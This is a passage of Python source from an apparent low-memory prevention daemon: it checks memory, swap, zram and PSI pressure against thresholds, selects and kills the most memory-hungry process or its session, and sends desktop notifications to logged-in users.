soft_threshold_min_swap_percent / 100.0
else:
soft_threshold_min_swap_kb = swap_kb_dict['soft_threshold_min_swap_kb']
if swap_warn_is_percent:
warning_threshold_min_swap_kb = swap_total * \
warning_threshold_min_swap_percent / 100.0
else:
warning_threshold_min_swap_kb = swap_kb_dict[
'warning_threshold_min_swap_kb']
if swap_total > hard_threshold_min_swap_kb:
swap_sigkill_pc = percent(
hard_threshold_min_swap_kb / (swap_total + 0.1))
else:
swap_sigkill_pc = '-'
if swap_total > soft_threshold_min_swap_kb:
swap_sigterm_pc = percent(
soft_threshold_min_swap_kb / (swap_total + 0.1))
else:
swap_sigterm_pc = '-'
if (mem_available <= hard_threshold_min_mem_kb and
swap_free <= hard_threshold_min_swap_kb):
mem_info = 'Memory status that requires corrective actions:\n Mem' \
'Available [{} MiB, {} %] <= hard_threshold_min_mem [{} MiB, ' \
'{} %]\n SwapFree [{} MiB, {} %] <= hard_threshold_min_swap [{} MiB, {} %]'.format(
kib_to_mib(mem_available),
percent(mem_available / mem_total),
kib_to_mib(hard_threshold_min_mem_kb),
percent(hard_threshold_min_mem_kb / mem_total),
kib_to_mib(swap_free),
percent(swap_free / (swap_total + 0.1)),
kib_to_mib(hard_threshold_min_swap_kb),
swap_sigkill_pc)
return (SIGKILL, mem_info, mem_available, hard_threshold_min_swap_kb,
soft_threshold_min_swap_kb, swap_free, swap_total)
if (mem_available <= soft_threshold_min_mem_kb and
swap_free <= soft_threshold_min_swap_kb):
mem_info = 'Memory status that requires corrective actions:\n MemAvailable [{} MiB, {} %] <= soft_threshold_min_mem [{} MiB, {} %]\n SwapFree [{} MiB, {} %] <= soft_threshold_min_swap [{} MiB, {} %]'.format(
kib_to_mib(mem_available),
percent(mem_available / mem_total),
kib_to_mib(soft_threshold_min_mem_kb),
round(soft_threshold_min_mem_percent, 1),
kib_to_mib(swap_free),
percent(swap_free / (swap_total + 0.1)),
kib_to_mib(soft_threshold_min_swap_kb),
swap_sigterm_pc)
return (SIGTERM, mem_info, mem_available, hard_threshold_min_swap_kb,
soft_threshold_min_swap_kb, swap_free, swap_total)
if low_memory_warnings_enabled:
if (mem_available <= warning_threshold_min_mem_kb and swap_free <=
warning_threshold_min_swap_kb + 0.1):
return ('WARN', None, mem_available, hard_threshold_min_swap_kb,
soft_threshold_min_swap_kb, swap_free, swap_total)
return (None, None, mem_available, hard_threshold_min_swap_kb,
soft_threshold_min_swap_kb, swap_free, swap_total)
def check_mem_and_swap():
"""find mem_available, swap_total, swap_free"""
with open('/proc/meminfo') as f:
for n, line in enumerate(f):
if n == 2:
mem_available = int(line.split(':')[1][:-4])
continue
if n is swap_total_index:
swap_total = int(line.split(':')[1][:-4])
continue
if n is swap_free_index:
swap_free = int(line.split(':')[1][:-4])
break
return mem_available, swap_total, swap_free
def kib_to_mib(num):
"""Convert KiB values to MiB values."""
return round(num / 1024.0)
def percent(num):
"""Interprete num as percentage."""
return round(num * 100, 1)
def check_zram_exceeded():
"""
"""
mem_used_zram = check_zram()
if mem_used_zram >= hard_threshold_max_zram_kb:
mem_info = 'Memory status that requires corrective actions:\n MemUsedZram [{} MiB, {} %] >= hard_threshold_max_zram [{} MiB, {} %]'.format(
kib_to_mib(mem_used_zram),
percent(mem_used_zram / mem_total),
kib_to_mib(hard_threshold_max_zram_kb),
percent(hard_threshold_max_zram_kb / mem_total))
return SIGKILL, mem_info, mem_used_zram
if mem_used_zram >= soft_threshold_max_zram_kb:
mem_info = 'Memory status that requires corrective actions:\n MemUsedZram [{} MiB, {} %] >= soft_threshold_max_zram [{} M, {} %]'.format(
kib_to_mib(mem_used_zram),
percent(mem_used_zram / mem_total),
kib_to_mib(soft_threshold_max_zram_kb),
percent(soft_threshold_max_zram_kb / mem_total))
return SIGTERM, mem_info, mem_used_zram
if low_memory_warnings_enabled:
if mem_used_zram >= warning_threshold_max_zram_kb:
return 'WARN', None, mem_used_zram
return None, None, mem_used_zram
def check_zram():
"""find MemUsedZram"""
if not os.path.exists('/sys/block/zram0'):
return 0
disksize_sum = 0
mem_used_total_sum = 0
for dev in os.listdir('/sys/block'):
if dev.startswith('zram'): # заменить на проверку существования зрам-специфик фала
stat = zram_stat(dev)
disksize_sum += int(stat[0])
mem_used_total_sum += int(stat[1])
# It means that when setting zram disksize = 1 GiB available memory
# decrease by 0.0042 GiB.
# Found experimentally, requires clarification with different kernaels and
# architectures.
# On small disk drives (up to gigabyte) it can be more, up to 0.0045.
# The creator of the zram module claims that ZRAM_DISKSIZE_FACTOR should
# be 0.001:
# ("zram uses about 0.1% of the size of the disk"
# - https://www.kernel.org/doc/Documentation/blockdev/zram.txt),
# but this statement contradicts the experimental data.
# ZRAM_DISKSIZE_FACTOR = deltaMemAvailavle / disksize
# Found experimentally.
ZRAM_DISKSIZE_FACTOR = 0.0042
return (mem_used_total_sum + disksize_sum * ZRAM_DISKSIZE_FACTOR) / 1024.0
def zram_stat(zram_id):
"""
Get zram state.
zram_id: str zram block-device id
returns bytes disksize, str mem_used_total
"""
try:
disksize = rline1('/sys/block/' + zram_id + '/disksize')
except FileNotFoundError:
return '0', '0'
if disksize == ['0\n']:
return '0', '0'
try:
mm_stat = rline1('/sys/block/' + zram_id + '/mm_stat').split(' ')
mm_stat_list = []
for i in mm_stat:
if i != '':
mm_stat_list.append(i)
mem_used_total = mm_stat_list[2]
except FileNotFoundError:
mem_used_total = rline1('/sys/block/' + zram_id + '/mem_used_total')
return disksize, mem_used_total # BYTES, str
def check_psi_exceeded(
hard_threshold_psi_exceeded_timer,
soft_threshold_psi_exceeded_timer,
psi_timestamp0):
"""
"""
psi_delta0 = monotonic() - psi_timestamp0
psi_timestamp0 = monotonic()
psi_avg_value = find_psi_metrics_value(psi_path, psi_metrics)
# print(psi_avg_value)
psi_post_action_delay_timer = monotonic() - last_action_dict['t']
if psi_post_action_delay_timer >= psi_post_action_delay:
psi_post_action_delay_exceeded = True
else:
psi_post_action_delay_exceeded = False
if psi_avg_value >= hard_threshold_max_psi:
hard_threshold_psi_exceeded = True
hard_threshold_psi_exceeded_timer += psi_delta0
else:
hard_threshold_psi_exceeded = False
hard_threshold_psi_exceeded_timer = 0
if debug_psi:
log('------------------------------------------------------------------------')
log('psi_post_action_delay_timer: {}, psi_post_action_delay_exceeded: {}'.format(
round(psi_post_action_delay_timer, 1), psi_post_action_delay_exceeded))
log('hard_threshold_psi_exceeded: {}, hard_threshold_psi_exceeded_timer: {}'.format(
hard_threshold_psi_exceeded, round(hard_threshold_psi_exceeded_timer, 1)))
if (hard_threshold_psi_exceeded_timer >= psi_excess_duration and
psi_post_action_delay_exceeded):
mem_info = 'PSI ({}) > hard_threshold_max_psi ({})\n' \
'PSI exceeded psi_excess_duration (value' \
' = {} sec) for {} seconds'.format(
psi_avg_value,
hard_threshold_max_psi,
psi_excess_duration,
round(hard_threshold_psi_exceeded_timer, 1)
)
return (SIGKILL, mem_info, hard_threshold_psi_exceeded_timer,
soft_threshold_psi_exceeded_timer, psi_timestamp0)
if psi_avg_value >= soft_threshold_max_psi:
soft_threshold_psi_exceeded = True
soft_threshold_psi_exceeded_timer += psi_delta0
else:
soft_threshold_psi_exceeded = False
soft_threshold_psi_exceeded_timer = 0
if debug_psi:
log('soft_threshold_psi_exceeded: {}, soft_threshold_psi_exceeded_timer: {}'.format(
soft_threshold_psi_exceeded, round(soft_threshold_psi_exceeded_timer, 1)))
if (soft_threshold_psi_exceeded_timer >= psi_excess_duration and
psi_post_action_delay_exceeded):
mem_info = 'PSI ({}) > soft_threshold_max_psi ({})\n' \
'PSI exceeded psi_excess_duration (value' \
' = {} sec) for {} seconds'.format(
psi_avg_value,
soft_threshold_max_psi,
psi_excess_duration,
round(soft_threshold_psi_exceeded_timer, 1)
)
return (SIGTERM, mem_info, hard_threshold_psi_exceeded_timer,
soft_threshold_psi_exceeded_timer, psi_timestamp0)
if low_memory_warnings_enabled:
if psi_avg_value >= warning_threshold_max_psi:
return ('WARN', None, hard_threshold_psi_exceeded_timer,
soft_threshold_psi_exceeded_timer, psi_timestamp0)
return (None, None, hard_threshold_psi_exceeded_timer,
soft_threshold_psi_exceeded_timer, psi_timestamp0)
def find_psi_metrics_value(psi_path, psi_metrics):
"""
"""
if psi_support:
if psi_metrics == 'some_avg10':
return float(rline1(psi_path).split(' ')[1].split('=')[1])
if psi_metrics == 'some_avg60':
return float(rline1(psi_path).split(' ')[2].split('=')[1])
if psi_metrics == 'some_avg300':
return float(rline1(psi_path).split(' ')[3].split('=')[1])
if psi_metrics == 'full_avg10':
with open(psi_path) as f:
psi_list = f.readlines()
return float(psi_list[1].split(' ')[1].split('=')[1])
if psi_metrics == 'full_avg60':
with open(psi_path) as f:
psi_list = f.readlines()
return float(psi_list[1].split(' ')[2].split('=')[1])
if psi_metrics == 'full_avg300':
with open(psi_path) as f:
psi_list = f.readlines()
return float(psi_list[1].split(' ')[3].split('=')[1])
def human(num, lenth):
"""Convert KiB values to MiB values with right alignment"""
return str(round(num / 1024)).rjust(lenth, ' ')
def just_percent_mem(num):
"""convert num to percent and justify"""
return str(round(num * 100, 1)).rjust(4, ' ')
def just_percent_swap(num):
"""
"""
return str(round(num * 100, 1)).rjust(5, ' ')
def sleep_after_check_mem():
"""Specify sleep times depends on rates and avialable memory."""
if stable_sleep:
if debug_sleep:
log('Sleep {} sec'.format(min_sleep))
stdout.flush()
sleep(min_sleep)
return None
if hard_threshold_min_mem_kb < soft_threshold_min_mem_kb:
mem_point = mem_available - soft_threshold_min_mem_kb
else:
mem_point = mem_available - hard_threshold_min_mem_kb
if hard_threshold_min_swap_kb < soft_threshold_min_swap_kb:
swap_point = swap_free - soft_threshold_min_swap_kb
else:
swap_point = swap_free - hard_threshold_min_swap_kb
if swap_point < 0:
swap_point = 0
if mem_point < 0:
mem_point = 0
t_mem = mem_point / fill_rate_mem
t_swap = swap_point / fill_rate_swap
if CHECK_ZRAM:
t_zram = (mem_total * 0.8 - mem_used_zram) / fill_rate_zram
if t_zram < 0:
t_zram = 0
t_mem_zram = t_mem + t_zram
z = ', t_zram={}'.format(round(t_zram, 2))
else:
z = ''
t_mem_swap = t_mem + t_swap
if CHECK_ZRAM:
if t_mem_swap <= t_mem_zram:
t = t_mem_swap
else:
t = t_mem_zram
else:
t = t_mem_swap
if t > max_sleep:
t = max_sleep
elif t < min_sleep:
t = min_sleep
else:
pass
if debug_sleep:
log('Sleep {} sec (t_mem={}, t_swap={}{})'.format(round(t, 2), round(
t_mem, 2), round(t_swap, 2), z))
stdout.flush()
sleep(t)
###########################################################################################################################
###########################################################################################################################
# 3 Работа с внешними командами: эксе, треды, уведомл
def send_notify_warn():
""" Implement Low memory warnings
"""
log('Warning threshold exceeded')
if check_warning_exe:
start_thread(exe, warning_exe)
else:
title = 'Low memory'
body = 'MemAvail: {}%\nSwapFree: {}%'.format(
round(mem_available / mem_total * 100),
round(swap_free / (swap_total + 0.1) * 100)
)
start_thread(send_notification, title, body)
def start_thread(func, *a, **k):
""" run function in a new thread
"""
th = threading.Thread(target=func, args=a, kwargs=k, daemon=True)
th_name = th.getName()
if debug_threading:
log('Starting {} from {}'.format(
th_name, threading.current_thread().getName()
))
try:
t1 = monotonic()
th.start()
t2 = monotonic()
if debug_threading:
log('{} has started in {} ms, {} threads are '
'currently alive'.format(th_name, round((
t2 - t1) * 1000, 1), threading.active_count()))
except RuntimeError:
log('RuntimeError: cannot start {}'.format(th_name))
return 1
def exe(cmd):
""" execute cmd in subprocess.Popen()
"""
cmd_list = shlex.split(cmd)
cmd_num_dict['cmd_num'] += 1
cmd_num = cmd_num_dict['cmd_num']
log('Execute the command ({}) in {}: {}'.format(
cmd_num,
threading.current_thread().getName(),
cmd_list))
t3 = monotonic()
with Popen(cmd_list) as proc:
try:
proc.wait(timeout=exe_timeout)
exit_status = proc.poll()
t4 = monotonic()
log('Command ({}) execution completed in {} sec; exit status'
': {}'.format(cmd_num, round(t4 - t3, 3), exit_status))
except TimeoutExpired:
proc.kill()
t4 = monotonic()
log('TimeoutExpired for the command ({}) in {} sec'.format(
cmd_num, round(t4 - t3, 3)))
def send_notification(title, body):
"""
"""
if self_uid != 0:
cmd = ['notify-send', '--icon=dialog-warning', title, body]
username = '(UID={})'.format(self_uid)
pop(cmd, username)
return None
t1 = monotonic()
if envd['t'] is None:
list_with_envs = root_notify_env()
envd['list_with_envs'] = list_with_envs
envd['t'] = monotonic()
cached_env = ''
elif monotonic() - envd['t'] > env_cache_time:
list_with_envs = root_notify_env()
envd['list_with_envs'] = list_with_envs
envd['t'] = monotonic()
cached_env = ''
else:
list_with_envs = envd['list_with_envs']
cached_env = ' (cached)'
t2 = monotonic()
if debug_gui_notifications:
log('Found env in {} ms{}'.format(round((t2 - t1) * 1000), cached_env))
log('Title: {}'.format([title]))
log('Body: {}'.format([body]))
log('Env list: {}'.format(list_with_envs))
list_len = len(list_with_envs)
# if somebody logged in with GUI
if list_len > 0:
# iterating over logged-in users
for i in list_with_envs:
username, display_env, dbus_env = i[0], i[1], i[2]
display_tuple = display_env.partition('=')
dbus_tuple = dbus_env.partition('=')
display_value = display_tuple[2]
dbus_value = dbus_tuple[2]
cmd = [
'sudo', '-u', username,
'env',
'DISPLAY=' + display_value,
'DBUS_SESSION_BUS_ADDRESS=' + dbus_value,
'notify-send',
'--icon=dialog-warning',
title,
body
]
start_thread(pop, cmd, username)
else:
if debug_gui_notifications:
log('Nobody logged-in with GUI. Nothing to do.')
def pop(cmd, username):
""" run cmd in subprocess.Popen() - Уведомл обычного юзера
"""
cmd_num_dict['cmd_num'] += 1
cmd_num = cmd_num_dict['cmd_num']
log('Execute the Command-{} {} in {}'.format(
cmd_num,
cmd,
threading.current_thread().getName()
))
if swap_total == 0:
wait_time = 2
else:
wait_time = 20
t3 = monotonic()
with Popen(cmd) as proc:
try:
proc.wait(timeout=wait_time)
err = proc.poll()
t4 = monotonic()
if debug_gui_notifications:
log('Popen time: {} sec; exit status: {}; cmd: {}'.format(
round(t4 - t3, 3), err, cmd))
except TimeoutExpired:
proc.kill()
if debug_gui_notifications:
log('TimeoutExpired: notify user: {}'.format(username))
def root_notify_env():
"""return set(user, display, dbus)"""
m1 = monotonic()
unsorted_envs_list = []
nologin_loginuid = pid_to_loginuid('1')
# iterates over processes, find processes with suitable env
for pid in alive_pid_list():
loginuid = pid_to_loginuid(pid)
if loginuid != nologin_loginuid:
one_env = re_pid_environ(pid)
unsorted_envs_list.append(one_env)
env = set(unsorted_envs_list)
env.discard(None)
# deduplicate dbus
new_env = []
end = []
for i in env:
key = i[0] + i[1]
if key not in end:
end.append(key)
new_env.append(i)
else:
continue
m2 = monotonic()
print(m2 - m1)
return new_env
def re_pid_environ(pid):
"""
read environ of 1 process
returns tuple with USER, DBUS, DISPLAY like follow:
('user', 'DISPLAY=:0',
'DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus')
returns None if these vars is not in /proc/[pid]/environ
"""
try:
with open('/proc/' + pid + '/environ') as f:
env = f.read()
except FileNotFoundError:
log('notify helper: FileNotFoundError')
return None
except ProcessLookupError:
log('notify helper: ProcessLookupError')
return None
if display_env in env and dbus_env in env and user_env in env:
env_list = env.split('\x00')
# iterating over a list of process environment variables
for i in env_list:
# exclude Display Manager's user
if i.startswith('HOME=/var'):
return None
if i.startswith(user_env):
user = i
if user == 'USER=root':
return None
continue
if i.startswith(display_env):
display = i[:10]
continue
if i.startswith(dbus_env):
dbus = i
continue
try:
return user.partition('USER=')[2], display, dbus
except UnboundLocalError:
log('notify helper: UnboundLocalError')
return None
def send_notify(threshold, name, pid):
"""
Notificate about OOM Preventing.
threshold: key for notify_sig_dict
name: str process name
pid: str process pid
"""
title = 'System hang prevention'
if hide_corrective_action_type:
body = 'Corrective action applied'
else:
body = '<b>{}</b> [{}] <b>{}</b>'.format(
notify_sig_dict[threshold],
pid,
name.replace(
# symbol '&' can break notifications in some themes,
# therefore it is replaced by '*'
'&', '*'
))
start_thread(send_notification, title, body)
def send_notify_etc(pid, name, command):
"""
Notificate about OOM Preventing.
command: str command that will be executed
name: str process name
pid: str process pid
"""
title = 'System hang prevention'
if hide_corrective_action_type:
body = 'Corrective action applied'
else:
body = '<b>Victim is</b> [{}] <b>{}</b>\nExecute the command:\n<b>' \
'{}</b>'.format(pid, name.replace(
'&', '*'), command.replace('&', '*'))
start_thread(send_notification, title, body)
###########################################################################################################################
###########################################################################################################################
# 4 Имплемент
def alive_pid_list():
"""
"""
pid_list = get_pid_list()
pid_list.remove(self_pid)
if '1' in pid_list:
pid_list.remove('1')
for i in non_decimal_list:
if i in pid_list:
pid_list.remove(i)
return pid_list
def find_shells_set():
"""
"""
shells_set = set()
with open('/etc/shells') as f:
for line in f:
if line.startswith('/'):
shells_set.add(os.path.realpath(line.strip()))
return shells_set
def sid_to_sid_list(sid):
"""
"""
sid_list = []
alive_list = alive_pid_list()
for pid in alive_list:
s = pid_to_sid(pid)
if s == sid:
sid_list.append(pid)
return sid_list
def cgroup_unified_to_proc_list(cgroup):
"""
"""
_, cg_u_mp = find_cgroup_mountpoints()
if cg_u_mp is None:
return []
procs_path = '{}{}/cgroup.procs'.format(cg_u_mp, cgroup)
proc_list = []
try:
with open(procs_path) as f:
for pid in f:
proc_list.append(pid[:-1])
return proc_list
except FileNotFoundError:
return []
except ProcessLookupError:
return []
def cgroup_systemd_to_proc_list(cgroup):
"""
"""
cg_s_mp, cg_u_mp = find_cgroup_mountpoints()
if cg_s_mp is None:
if cg_u_mp is not None:
if os.path.exists('{}/system.slice'.format(cg_u_mp)):
cg_s_mp = cg_u_mp
else:
return []
else:
return []
procs_path = '{}{}/cgroup.procs'.format(cg_s_mp, cgroup)
proc_list = []
try:
with open(procs_path) as f:
for pid in f:
proc_list.append(pid[:-1])
return proc_list
except FileNotFoundError:
return []
except ProcessLookupError:
return []
def find_victim(_print_proc_table):
"""
Find the process with highest badness and its badness adjustment
Return pid and badness
"""
ft1 = monotonic()
pid_list = alive_pid_list()
pid_badness_list = []
if _print_proc_table:
if extra_table_info == 'None':
extra_table_title = ''
elif extra_table_info == 'cgroup_systemd':
extra_table_title = 'CGroup_systemd'
elif extra_table_info == 'cgroup_unified':
extra_table_title = 'CGroup_unified'
elif extra_table_info == 'cmdline':
extra_table_title = 'cmdline'
elif extra_table_info == 'environ':
extra_table_title = 'environ'
elif extra_table_info == 'realpath':
extra_table_title = 'realpath'
elif extra_table_info == 'cwd':
extra_table_title = 'cwd'
else:
extra_table_title = ''
hr = '#' * 107
log(hr)
log('# PID PPID badness oom_score oom_score_adj e'
'UID S VmSize VmRSS VmSwap Name {}'.format(
extra_table_title))
log('#------- ------- ------- --------- ------------- -------'
'--- - ------ ----- ------ ---------------')
for pid in pid_list:
badness = pid_to_badness(pid)[0]
if badness is None:
continue
if _print_proc_table:
try:
oom_score = rline1('/proc/' + pid + '/oom_score')
oom_score_adj = rline1('/proc/' + pid + '/oom_score_adj')
except FileNotFoundError:
continue
except ProcessLookupError:
continue
if pid_to_status(pid) is None:
continue
else:
(name, state, ppid, uid, vm_size, vm_rss,
vm_swap) = pid_to_status(pid)
if extra_table_info == 'None':
extra_table_line = ''
elif extra_table_info == 'cgroup_systemd':
extra_table_line = pid_to_cgroup_systemd(pid)
elif extra_table_info == 'cgroup_unified':
extra_table_line = pid_to_cgroup_unified(pid)
elif extra_table_info == 'cmdline':
extra_table_line = pid_to_cmdline(pid)
elif extra_table_info == 'environ':
extra_table_line = pid_to_environ(pid)
elif extra_table_info == 'realpath':
extra_table_line = pid_to_realpath(pid)
elif extra_table_info == 'cwd':
extra_table_line = pid_to_cwd(pid)
else:
extra_table_line = ''
sid = pid_to_sid(pid)
nn = pid_to_name(sid)
lu = pid_to_loginuid(pid)
an = pid_to_ancestry(pid, max_victim_ancestry_depth=9)
extra_table_line = 'SID: {} ({}) | LUID: {} | {}'.format(sid, nn, lu, an)
log('#{} {} {} {} {} {} {} {} {} {} {} {}'.format(
pid.rjust(7),
ppid.rjust(7),
str(badness).rjust(7),
oom_score.rjust(9),
oom_score_adj.rjust(13),
uid.rjust(10),
state,
str(vm_size).rjust(6),
str(vm_rss).rjust(5),
str(vm_swap).rjust(6),
name.ljust(15),
extra_table_line
)
)
pid_badness_list.append((pid, badness))
real_proc_num = len(pid_badness_list)
# Make list of (pid, badness) tuples, sorted by 'badness' values
# print(pid_badness_list)
pid_tuple_list = sorted(
pid_badness_list,
key=itemgetter(1),
reverse=True
)[0]
pid = pid_tuple_list[0]
victim_id = get_victim_id(pid)
# Get maximum 'badness' value
victim_badness = pid_tuple_list[1]
victim_name = pid_to_name(pid)
if _print_proc_table:
log(hr)
log('Found {} living tasks in userspace (except init and nohang)'.format(
real_proc_num))
log(
'Process with highest badness (found in {} ms):\n PID: {}, Na'
'me: {}, badness: {}'.format(
round((monotonic() - ft1) * 1000),
pid,
victim_name,
victim_badness
)
)
return pid, victim_badness, victim_name, victim_id
def real_implement_corrective_action(
victim_pid, threshold, time0, vwd, victim_id, victim_name):
"""
"""
cgroup_unified = pid_to_cgroup_unified(victim_pid)
cgroup_systemd = pid_to_cgroup_systemd(victim_pid)
victim_autogroup = pid_to_autogroup(victim_pid)
victim_sid = pid_to_sid(victim_pid)
victim_sid_name = pid_to_name(victim_sid)
victim_sid_exe_realpath = os.path.realpath('/proc/{}/exe'.format(victim_sid))
print(victim_sid_name, victim_sid_exe_realpath)
log('\nSID: {} \nautogroup: {} \ncgroup_unified: {} \ncgroup_systemd: {}\n'.format(
victim_sid,
victim_autogroup,
cgroup_unified,
cgroup_systemd
))
"""
1 Знаем жертву и ее свойства. Можем ее убить. - первичный имплемент сразу
2 kill_shell_sessions_group
3 kill_session_regex_sid_name_list
4 kill_cgroup_unified_enabled
5 custom_action_re_cgroup_systemd
6 отслеживание
7 уведомление
"""
ttt0 = monotonic()
killed_set = set()
log('Implement a corrective action:')
#################################################################
# сигнал жертве
try:
os.kill(int(victim_pid), threshold)
killed_set.add(victim_pid)
log(' Killing process {} ({})'.format(victim_pid, victim_name))
response_time = monotonic() - time0
send_result = 'total response time: {} ms'.format(
round(response_time * 1000))
preventing_oom_message = 'Implement a corrective action:' \
'\n Send {} to the victim; {}'.format(
sig_dict[threshold], send_result)
# success = True
if threshold is SIGKILL:
vwd = True
except FileNotFoundError:
vwd = True
# success = False
# response_time = monotonic() - time0
# send_result = 'no such process; response time: {} ms'.format(round(response_time * 1000))
key = ' The victim died in the search process: ' \
'FileNotFoundError'
except ProcessLookupError:
vwd = True
# success = False
# response_time = monotonic() - time0
# send_result = 'no such process; response time: {} ms'.format(round(response_time * 1000))
key = ' The victim died in the search process: ' \
'ProcessLookupError'
########################################################################
autogroup_was_killed = False
if kill_shell_sessions_group:
if victim_sid_exe_realpath in find_shells_set():
print('Killing autogroup {}'.format(victim_autogroup))
for pid in alive_pid_list():
#print(pid)
if is_unkillable(pid):
#print('U!')
continue
au = pid_to_autogroup(pid)
#print(au)
if au == victim_autogroup and pid not in killed_set:
try:
os.kill(int(pid), SIGKILL)
killed_set.add(pid)
log('Killing process {} ({})'.format(
pid, pid_to_name(pid)))
except FileNotFoundError:
pass
except ProcessLookupError:
pass
autogroup_was_killed = True
#print('Killed tasks:', killed_set)
#################################################################
# убиваем сессию
#print(kill_session_regex_sid_name_list)
# Можно ли выделить в фцию? Знаем пид жертвы - убиваем ее сессию.
if kill_session_enabled and not autogroup_was_killed:
kill_session = False
for sid_name_re in kill_session_regex_sid_name_list:
if search(sid_name_re, victim_sid_name) is not None:
kill_session = True
vwd = True
killed_session_counter = 1
log(" Regular expression '{}' matches with session leader name '{}'".format(
sid_name_re, victim_sid_name))
break
uu1 = monotonic()
if kill_session:
log(" Killing victim's session (SID: {}, session leader: {}, autogroup: {})".format(
victim_sid, victim_sid_name, victim_autogroup))
if victim_sid != victim_pid:
try:
if victim_sid not in killed_set:
os.kill(int(victim_sid), SIGKILL)
killed_set.add(victim_sid)
killed_session_counter += 1
log(' Killing process {} ({})'.format(victim_sid, victim_sid_name))
except FileNotFoundError:
log(' FileNotFoundError')
except ProcessLookupError:
log(' ProcessLookupError')
pid_list = alive_pid_list()
# pid_set = set(pid_list)
for pid in pid_list:
if pid in killed_set:
continue
au = pid_to_autogroup(pid)
if au == victim_autogroup:
try:
if pid not in killed_set:
os.kill(int(pid), SIGKILL)
killed_set.add(pid)
killed_session_counter += 1
log(' Killing process {} ({})'.format(pid, pid_to_name(pid)))
except FileNotFoundError:
log(' FileNotFoundError')
except ProcessLookupError:
log(' ProcessLookupError')
autogroup_was_killed = True
if kill_session:
print(" {} processes were killed in this session".format(
killed_session_counter))
uu2 = monotonic()
print(uu2 - uu1)
print('Killed tasks:', killed_set)
#################################################################
"""
if kill_cgroup_unified_enabled:
pass
"""
#################################################################
if custom_action_re_cgroup_systemd:
print('GROUP:SYSTEMD')
kill_group_systemd = False
for rega, kill_group, _ in custom_action_re_cgroup_systemd_list:
print(rega, kill_group)
print(rega, cgroup_systemd)
if search(rega, cgroup_systemd) is not None and kill_group:
kill_group_systemd = True
break
print('Будет убита?', kill_group_systemd)
if kill_group_systemd:
log(" Killing victim's systemd cgroup '{}'".format(
cgroup_systemd))
cg_proc_list = cgroup_systemd_to_proc_list(cgroup_systemd)
killed_cg_counter = 1
for pid in cg_proc_list:
if pid == victim_pid:
continue
try:
os.kill(int(pid), SIGKILL)
killed_cg_counter += 1
log(' Killing process {} ({})'.format(
pid, pid_to_name(pid)))
except FileNotFoundError:
log(' FileNotFoundError')
except ProcessLookupError:
log(' FileNotFoundError')
print(killed_cg_counter)
#cg_proc_list = cgroup_systemd_to_proc_list(cgroup_systemd)
# print(cg_proc_list)
# sleep(5)
#cg_proc_list = cgroup_systemd_to_proc_list(cgroup_systemd)
# print(cg_proc_list)
#################################################################
# отслеживание жертвы
if not vwd:
if victim_id not in v_dict:
v_dict[victim_id] = dict()
v_dict[victim_id]['time'] = monotonic()
v_dict[victim_id]['name'] = victim_name
else:
pass
last_action_dict['t'] = kill_timestamp = monotonic()
# print(v_dict)
# response_time = monotonic() - time0
# log('success: ' + str(success))
# log('victim will die: ' + str(vwd))
# log('response_time: ' + str(response_time) + ' sec')
# НАЧАЛО ОТСЛЕЖИВАНИЯ СОСТОЯНИЯ ЖЕРТВЫ. Можно вынести в отд фц. Приним
# айди, логирует, возвращает что-то.
# Далее поработать со словарями. Жертва тут умерла - сброс таймера. Все
# старые жертвы умерли до 3х секунд с следующих циклах - сброс таймера.
# После этого все должно быть супер охуенно.
# ??? - Это было для пси. Перепротестировать. Не сломано ли пси теперь?
kill_timestamp = ttt0
while True:
sleep(0.01)
iva = is_victim_alive(victim_id)
d = monotonic() - kill_timestamp
if iva == 'X':
if victim_id in v_dict:
v_dict.pop(victim_id)
a = d
break
elif iva == 'E':
b = d
if not vwd and d > sensitivity_test_time:
break
elif iva == 'R':
c = d
pass
else:
if victim_id in v_dict:
v_dict.pop(victim_id)
e = d
sleep(post_zombie_delay)
break
ttt5 = monotonic()
try:
print(a)
except Exception:
pass
#print('a ---')
try:
print(b)
except Exception:
pass
#print('b ---')
try:
print(c)
except Exception:
pass
#print('c ---')
try:
print(e)
except Exception:
pass
#print('e ---')
print('ttt5', ttt5 - kill_timestamp)
mem_available, swap_total, swap_free = check_mem_and_swap()
ma_mib = int(mem_available) / 1024.0
sf_mib = int(swap_free) / 1024.0
log('Memory status after implementing a corrective act'
'ion:\n MemAvailable'
': {} MiB, SwapFree: {} MiB'.format(
round(ma_mib, 1), round(sf_mib, 1)))
soft_match = False # исправить костыль
if soft_match is False:
key = ' Send {} to {}'.format(sig_dict[threshold], victim_name)
update_stat_dict_and_print(key)
else:
key = " Run the command '{}'".format(command)
update_stat_dict_and_print(key)
#################################################################
# тут запуск команды
if post_action_gui_notifications:
if soft_match:
send_notify_etc(pid, victim_name, cmd)
else:
if autogroup_was_killed:
send_notify(SIGKILL, victim_name + '\n and its autogroup', victim_pid)
else:
send_notify(threshold, victim_name, victim_pid)
def implement_corrective_action(
threshold,
mem_info_list,
hard_threshold_psi_exceeded_timer,
soft_threshold_psi_exceeded_timer,
psi_timestamp0,
psi_threshold,
zram_threshold,
zram_info,
psi_info):
log('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>')
time0 = monotonic()
debug_corrective_action = True
for i in mem_info_list:
log(i) # печат превышенные пороги
# 3
# 1. Очистка словаря от мертвых. Итерация по словарю, отслеживание умирающих.
# 2. Итерация по оставшемуся словарю. Поиск дельт. Если хоть у одного
# дельта НЕ истекла - ЖДЕМ, выход из фции.
print('Словарь живых на входе', v_dict)
deadlist = [] # ? nu -> deadlist # сожержит victim_id
for victim_id in v_dict: # ищем недобитых
iva = is_victim_alive(victim_id)
print(iva, victim_id)
if iva == 'X' or iva == 'Z':
deadlist.append(victim_id) # наполняем спосик умерших
"""
continue
if iva == 'E':
continue
if iva == 'R':
pass # быстро отследить умирающего
"""
for i in deadlist:
if debug_corrective_action:
log('Remove {} from v_dict'.format(i))
# итерируемся по списку мёртвых и удаляем мертвых из словаря живых
# жертв
v_dict.pop(i)
print('Словарь жив жертв после удал мертвых', v_dict)
use_cached_victim = False # Бить ли закэшированную жертву
cached_victims_list = []
# cached_victims_list.append(('foo', 0.01))
# cached_victims_list.append(('boo', 1111.01))
# 2
# print(v_dict)
for victim_id in v_dict: # итерируемся по живым недобитым жертвам
tx = v_dict[victim_id]['time'] # время прошлого действия
ddt = monotonic() - tx # Сколько времени прошло с прошлого действия
if ddt < victim_cache_time: # Если время кэшир жертвы не истекло
if debug_corrective_action:
